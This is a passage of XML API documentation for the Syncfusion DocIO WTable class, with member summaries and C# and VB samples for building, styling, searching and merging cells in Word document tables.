            <summary>
            Gets columns count.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTable.m_rows">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTable.m_style">
            <summary>
            The table style
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTable"/> class with the 
            specified <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.#ctor(Syncfusion.DocIO.DLS.IWordDocument,System.Boolean)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTable"/> class with the 
            specified <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance and show border option.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
            <param name="showBorder"><b>True</b> if to show the table border; otherwise, <b>false</b>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.Clone">
            <summary>
            Creates a duplicate copy of the table.
            </summary>
            <returns>The reference to the newly created <see cref="T:Syncfusion.DocIO.DLS.WTable"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.ResetCells(System.Int32,System.Int32)">
            <summary>
            Resets the table with the specified number of rows and columns.
            </summary>
            <param name="rowsNum">The <b>integer</b> specifies the number of rows.</param>
            <param name="columnsNum">The <b>integer</b> specifies the number of columns.</param>
            <example>The following example illustrates how to add a table to the document.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Gets the first section in the document
                IWSection section = document.AddSection();
                //Add new table to the section
                IWTable table = section.AddTable();
                //Set rows and columns count
                table.ResetCells(2, 2);
                //Add contents to the table
                IWParagraph paragraph = table[0, 0].AddParagraph();
                paragraph.AppendText("Apple");
                paragraph = table[0, 1].AddParagraph();
                paragraph.AppendText("Red");
                paragraph = table[1, 0].AddParagraph();
                paragraph.AppendText("Banana");
                paragraph = table[1, 1].AddParagraph();
                paragraph.AppendText("Yellow");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Gets the first section in the document
                Dim section As IWSection = document.AddSection()
                'Add new table to the section
                Dim table As IWTable = section.AddTable()
                'Set rows and columns count
                table.ResetCells(2, 2)
                'Add contents to the table
                Dim paragraph As IWParagraph = table(0, 0).AddParagraph()
                paragraph.AppendText("Apple")
                paragraph = table(0, 1).AddParagraph()
                paragraph.AppendText("Red")
                paragraph = table(1, 0).AddParagraph()
                paragraph.AppendText("Banana")
                paragraph = table(1, 1).AddParagraph()
                paragraph.AppendText("Yellow")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <exception cref="T:System.ArgumentException">The number of cells must be between 1 and 63.</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.ResetCells(System.Int32,System.Int32,Syncfusion.DocIO.DLS.RowFormat,System.Single)">
            <summary>
            Resets the table with the specified number of rows and columns, table format and cell width.
            </summary>
            <param name="rowsNum">The <b>integer</b> specifies the number of rows.</param>
            <param name="columnsNum">The <b>integer</b> specifies the number of columns.</param>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.RowFormat"/> specifies the  format for the table.</param>
            <param name="cellWidth">The <b>float</b> specifies the width of the cells.</param>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                RowFormat format = new RowFormat();
                format.BackColor = Color.LightGray;
                format.CellSpacing = 2;
                format.Paddings.All = 2;
                //Set number of rows and columns
                table.ResetCells(2, 2, format, 200);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                Dim format As New RowFormat()
                format.BackColor = Color.LightGray
                format.CellSpacing = 2
                format.Paddings.All = 2
                'Set number of rows and columns
                table.ResetCells(2, 2, format, 200)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.ApplyStyle(Syncfusion.DocIO.DLS.BuiltinTableStyle)">
            <summary>
            Applies the built-in table style to the table.
            </summary>
            <param name="builtinTableStyle">The <see cref="T:Syncfusion.DocIO.DLS.BuiltinTableStyle"/> to be applied for the table.</param>
            <example>The following example illustrates how to apply built-in style for the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                //Get the table
                WTable table = section.Tables[0] as WTable;
                //Apply "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                'Get the table
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Apply "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.AddRow">
            <summary>
            Adds a new row to the table.
            </summary>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/>.</returns>
            <example>The following example illustrates how to add new row to the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Price Details");
                section.AddParagraph();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Add the first row to table
                WTableRow row = table.AddRow();
                //Add the first cell into first row 
                WTableCell cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Apple");
                //Add the second cell into first row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("$40");
                //Add second row to table
                row = table.AddRow(false);
                //Add the first cell into first row 
                cell = row.Cells[0];
                cell.AddParagraph().AppendText("Orange");
                //Add the second cell into first row 
                cell = row.Cells[1];
                cell.AddParagraph().AppendText("$30");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Price Details")
                section.AddParagraph()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Add the first row to table
                Dim row As WTableRow = table.AddRow()
                'Add the first cell into first row 
                Dim cell As WTableCell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Apple")
                'Add the second cell into first row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("$40")
                'Add second row to table
                row = table.AddRow(False)
                'Add the first cell into first row 
                cell = row.Cells(0)
                cell.AddParagraph().AppendText("Orange")
                'Add the second cell into first row 
                cell = row.Cells(1)
                cell.AddParagraph().AppendText("$30")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.AddRow(System.Boolean)">
            <summary>
            Adds a new row to table specifying whether to have the same format as the previous row.
            </summary>
            <param name="isCopyFormat"><b>True</b> if to have the same format as previous row; otherwise, <b>false</b>.</param>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/>.</returns>
            <example>The following example illustrates how to add new row to the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Price Details");
                section.AddParagraph();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Add the first row to table
                WTableRow row = table.AddRow();
                //Add the first cell into first row 
                WTableCell cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Apple");
                //Add the second cell into first row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("$40");
                //Add second row to table
                row = table.AddRow(false);
                //Add the first cell into first row 
                cell = row.Cells[0];
                cell.AddParagraph().AppendText("Orange");
                //Add the second cell into first row 
                cell = row.Cells[1];
                cell.AddParagraph().AppendText("$30");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Price Details")
                section.AddParagraph()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Add the first row to table
                Dim row As WTableRow = table.AddRow()
                'Add the first cell into first row 
                Dim cell As WTableCell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Apple")
                'Add the second cell into first row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("$40")
                'Add second row to table
                row = table.AddRow(False)
                'Add the first cell into first row 
                cell = row.Cells(0)
                cell.AddParagraph().AppendText("Orange")
                'Add the second cell into first row 
                cell = row.Cells(1)
                cell.AddParagraph().AppendText("$30")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.AddRow(System.Boolean,System.Boolean)">
            <summary>
            Adds a new row to table specifying whether to have the same format and cells count similar to the previous row.
            </summary>
            <param name="isCopyFormat"><b>True</b> if to have the same format as previous row; otherwise, <b>false</b>.</param>
            <param name="autoPopulateCells"><b>True</b> if need to auto populate cells; otherwise, <b>false</b>.</param>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/>.</returns>
            <example>The following example illustrates how to add a row with formatting similar to the previous row.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Price Details");
                section.AddParagraph();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Add the first row into table
                WTableRow row = table.AddRow();
                //Add the first cell into first row 
                WTableCell cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Item");
                //Add the second cell into first row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Price($)");
                //Add the second row into table
                row = table.AddRow(true, false);
                //Add the first cell into second row
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Apple");
                //Add the second cell into second row
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("50");
                //Add the third row into table
                row = table.AddRow(true, false);
                //Add the first cell into third row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Orange");
                //Add the second cell into third row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("30");
                document.Save("Table.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Price Details")
                section.AddParagraph()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Add the first row into table
                Dim row As WTableRow = table.AddRow()
                'Add the first cell into first row 
                Dim cell As WTableCell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Item")
                'Add the second cell into first row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Price($)")
                'Add the second row into table
                row = table.AddRow(True, False)
                'Add the first cell into second row
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Apple")
                'Add the second cell into second row
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("50")
                'Add the third row into table
                row = table.AddRow(True, False)
                'Add the first cell into third row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Orange")
                'Add the second cell into third row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("30")
                document.Save("Table.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.Replace(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of given regular expression in the table with the replace string.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns> 
            <example>The following example illustrates how to replace a text in the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Replace the text
                table.Replace(new Regex("illustrates"), "describes");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Replace the text
                table.Replace(New Regex("illustrates"), "describes")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.Replace(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the table with replace string, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>The following example illustrates how to replace a text in the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Replace the text
                table.Replace("illustrates", "describes", true, true);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Replace the text
                table.Replace("illustrates", "describes", True, True)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces the specified regular expression with a <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> in the table.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> which specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>The following example illustrates how to replace a text in the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Get first paragraph
                WParagraph paragraph = document.Sections[0].Paragraphs[0];
                //Get the text using text selection
                TextSelection selection = new TextSelection(paragraph, 0, 20);
                //Replace the text
                table.Replace(new Regex("illustrates"), selection);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Get first paragraph
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(0)
                'Get the text using text selection
                Dim selection As New TextSelection(paragraph, 0, 20)
                'Replace the text
                table.Replace(New Regex("illustrates"), selection)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection,System.Boolean)">
            <summary>
            Replaces all entries of given regular expression in the table with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> along with its formatting.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> which specifies the text to replace.</param>
            <param name="saveFormatting">Set to <b>true </b>if to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>The following example illustrates how to replace a text in the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Get first paragraph
                WParagraph paragraph = document.Sections[0].Paragraphs[0];
                //Get the text using text selection
                TextSelection selection = new TextSelection(paragraph, 0, 20);
                //Replace the text
                table.Replace(new Regex("illustrates"), selection, true);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Get first paragraph
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(0)
                'Get the text using text selection
                Dim selection As New TextSelection(paragraph, 0, 20)
                'Replace the text
                table.Replace(New Regex("illustrates"), selection, True)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.Find(System.Text.RegularExpressions.Regex)">
            <summary>
            Returns first entry of the specified <see cref="T:System.Text.RegularExpressions.Regex"/> in the table.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> that specifies the text to be found.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> object which represents the text found.</returns>
            <example>The following example illustrates how to find a text in the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Find the text in the table
                TextSelection selection = table.Find(new Regex("content"));
                WTextRange text = selection.GetAsOneRange();
                //Set the character format of the text found
                text.CharacterFormat.AllCaps = true;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Find the text in the table
                Dim selection As TextSelection = table.Find(New Regex("content"))
                Dim text As WTextRange = selection.GetAsOneRange()
                'Set the character format of the text found
                text.CharacterFormat.AllCaps = True
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.ApplyVerticalMerge(System.Int32,System.Int32,System.Int32)">
            <summary>
            Applies the vertical merge for table cells specified by the column index, start row index and end row index.
            </summary>
            <param name="columnIndex">The <b>integer</b> specifies index of the column.</param>
            <param name="startRowIndex">The <b>integer</b> specifies start index of the row.</param>
            <param name="endRowIndex">The <b>integer</b> specifies end index of the row.</param>
            <example>The following example illustrates how to apply vertical merge for the table cells.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Vertical merging of Table cells");
                IWTable table = section.AddTable();
                table.ResetCells(5, 5);
                //Specify the vertical merge to the third cell, from second row to fifth row
                table.ApplyVerticalMerge(2, 1, 4);
                document.Save("VerticalMerge.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Vertical merging of Table cells")
                Dim table As IWTable = section.AddTable()
                table.ResetCells(5, 5)
                'Specify the vertical merge to the third cell, from second row to fifth row
                table.ApplyVerticalMerge(2, 1, 4)
                document.Save("VerticalMerge.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.ApplyHorizontalMerge(System.Int32,System.Int32,System.Int32)">
            <summary>
            Applies horizontal merge for table cells specified by the row index, start cell index and end cell index.
            </summary>
            <param name="rowIndex">The <b>integer</b> specifies index of the row.</param>
            <param name="startCellIndex">The <b>integer</b> specifies start index of the cell.</param>
            <param name="endCellIndex">The <b>integer</b> specifies end index of the cell.</param>
            <example>The following example illustrates how to apply horizontal merge for the table cells.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Vertical merging of Table cells");
                IWTable table = section.AddTable();
                table.ResetCells(5, 5);
                //Specify the horizontal merge from second cell to fifth cell in third row
                table.ApplyHorizontalMerge(2, 1, 4);
                document.Save("HorizontalMerge.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Vertical merging of Table cells")
                Dim table As IWTable = section.AddTable()
                table.ResetCells(5, 5)
                'Specify the horizontal merge from second cell to fifth cell in third row
                table.ApplyHorizontalMerge(2, 1, 4)
                document.Save("HorizontalMerge.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.RemoveAbsPosition">
            <summary>
            Removes the absolute position data, if the table has absolute position in the document.  
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.IsSDTInTableCell(Syncfusion.DocIO.DLS.SDTBlockContent)">
            <summary>
            Check whether table present inside the cell or not.
            </summary>
            <param name="sdtBlock"></param>
            <exclude/>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.GetOwnerTableCell">
            <summary>
            Get the owner table cell for the table
            </summary>
            <exclude/>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.GetTableText">
            <summary>
            Gets the table text.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.CheckNormalStyle">
            <summary>
            Checks the normal style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.GetStyle">
            <summary>
            Gets the style applied for the table.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWTableStyle"/> of the current table.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.ApplyStyle(Syncfusion.DocIO.DLS.IWTableStyle)">
            <summary>
            Applies the specified style.
            </summary>
            <param name="style">Style name</param>
            <remarks>Specified style must exist in Document.Styles collection</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.ApplyStyle(System.String)">
            <summary>
            Applies the specified style.
            </summary>
            <param name="style">Style name</param>
            <remarks>Specified style must exist in Document.Styles collection</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.ApplyBaseStyleFormats">
            <summary>
            Applies the base style formats.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.GetCellFormatFromStyle(System.Int32,System.Int32)">
            <summary>
            Get the current cell format from its table style
            </summary>
            <param name="rowIndex"></param>
            <param name="cellIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.UpdateRowBorders(Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Borders,System.Int32,System.Int32)">
            <summary>
            Updates the row borders.
            </summary>
            <param name="dest">The dest.</param>
            <param name="src">The src.</param>
            <param name="tableBorders">The table borders.</param>
            <param name="index">The index.</param>
            <param name="count">The count.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.UpdateColumnBorders(Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Borders,System.Int32,System.Int32)">
            <summary>
            Updates the column borders.
            </summary>
            <param name="dest">The dest.</param>
            <param name="src">The src.</param>
            <param name="tableBorders">The table borders.</param>
            <param name="index">The index.</param>
            <param name="count">The count.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.FindAll(System.Text.RegularExpressions.Regex)">
            <summary>
            Returns all entries of given regex.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.CloneImpl">
            <summary>
            Creates a duplicate copy of the table.
            <exclude/>
            </summary>
            <returns>The object that can be casted as <see cref="T:Syncfusion.DocIO.DLS.WTable"/>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.CloneStyleTo(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Clones the style.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.CheckTableGrid">
            <summary>
            Checks the table grid, after parsing Docx format documents.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.IsCellWidthZero">
            <summary>
            Determines whether the width and preferred width of a cell is zero.
            </summary>
            <returns>True if cell width and preferred width is zero; Otherwise false.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.UpdateCellWidthByPartitioning(System.Single)">
            <summary>
            Updates the cell width by equally partitioning the available width among all the cells in a row.
            </summary>
            <param name="tableWidth">The available width for table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.UpdateTableGrid(System.Boolean)">
            <summary>
            Updates the table grid.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.IsTablesAnyOneOfRowsCellWidthsDefined(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Check the Complete table Width is 0.
            </summary>
            <param name="tableCell"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.GetMaxRowWidth(System.Single)">
            <summary>
            Gets the width of the max row.
            </summary>
            <param name="clientWidth">Width of the client.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.UpdateCellWidth(Syncfusion.DocIO.DLS.WTableRow,System.Single,System.Single,System.Single)">
            <summary>
            Updates the width of the cell.
            </summary>
            <param name="row">The row.</param>
            <param name="clientWidth">Width of the client.</param>
            <param name="tableWidth">Width of the table.</param>
            <param name="maxRowWidth">Width of the max row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.GetGridBeforeAfter(Syncfusion.DocIO.DLS.WTableRow,System.Single,System.Boolean,System.Single,System.Single,System.Single,System.Boolean)">
            <summary>
            Gets the grid before after.
            </summary>
            <param name="row">The row.</param>
            <param name="clientWidth">Width of the client.</param>
            <param name="isAfterWidth">if set to <c>true</c> [is after width].</param>
            <param name="tableWidth">Width of the table.</param>
            <param name="currOffset">The curr offset.</param>
            <param name="maxRowWidth">Maximum width of the row.</param>
            <param name="isTableGridMissMatch">if set to <c>true</c> [is table grid miss match].</param>
            <returns></returns>
        </member>
